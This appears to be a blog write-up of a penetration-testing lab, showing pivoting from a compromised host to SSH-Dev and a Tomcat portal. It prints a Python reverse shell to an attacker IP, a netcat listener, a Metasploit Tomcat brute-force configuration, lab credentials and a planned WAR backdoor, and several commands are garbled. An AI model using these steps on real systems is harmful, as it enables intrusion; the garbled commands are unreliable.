Test Lab V8: SSH-Dev and Portal

Ahmad Khan March 11, 2023March 11, 2023 0 Comments black hat pakistan, Ethical hacking, hacking, Test Lab V8: SSH-Dev and Portal

This article is about Test Lab V8: SSH-Dev and Portal.

Information [Test Lab V8: SSH-Dev and Portal]:

Attack on SSH-Dev: As we can see in the diagram above, the IP of ssh-dev is 172.16.0.3, which cannot be pinged from the VPN network. So we will check the ping response from the Cabinet system, now we have already rooted the Cabinet system in our first part of the article where we uploaded the PHP shell to the system. Using the same backdoor, we used the ping command to check the SSH-Dev system.

SSH-Dev is therefore accessible from Cabinet. Let’s take a reverse shell from the Cabinet system to attack SSH-Dev, we introduced netcat by entering the following command nc-lvp 80

We used the following reverse Python shell to listen on port 80:

python -c “import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port)));

[os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(‘/bin/bash’)” <10.10.X.X> 80

Now we have the Cabinet system’s shell access.

Now we will upload the Westfall’s ssh key from Cabinet’s file upload vulnerability.

Then, from Cabinet’s shell access, we navigated to the uploads folder where our Westfall SSH key was uploaded, and using the key, we connected to the SSH-Dev system via SSH using the following command ssh -i key.txt [email protected]

After that, we typed ls command for a directory listing, and we found the token file.

Portal Attack: Portal System IP is 192.168.0.3 which is also not accessible from VPN. To access the Portal system, we must first connect via CISCO VPN and then connect to the SSH Server. How do we access the SSH server? You will find this in our 3rd part of the article. We have connected to the SSH Serve and now we need to scan the IP Portal to create a python based port scanner to scan all port ranges.

We have uploaded the python code above to the public folder of the SSH server system. Using the command: sudo scp -i /root/Desktop/ /root/Desktop/ [email protected]:/public

We tried some default credentials for Apache Tomcat but nothing worked. We decided to use a brute force attack on the user’s credentials by using the Metasploit helper. We started Metasploit using the following command:

use help/scanner/http/tomcat_mgr_login
set RHOSTS localhost
RPORT 9000 set
set PASS_FILE /usr/share/wordlists/dirb/big.txt
set USER_AS_PASS true
set BLANK_PASSWORDS true
set STOP_ON_SUCCESS true
set of THREADS 20
to use

At the end, we found the credentials which was tomcat : hydrogen

Now we need a reverse shell of this system for this we have to upload a JSP based backdoor. As can be seen below cmd.war file and it can be deployed as tomcat module.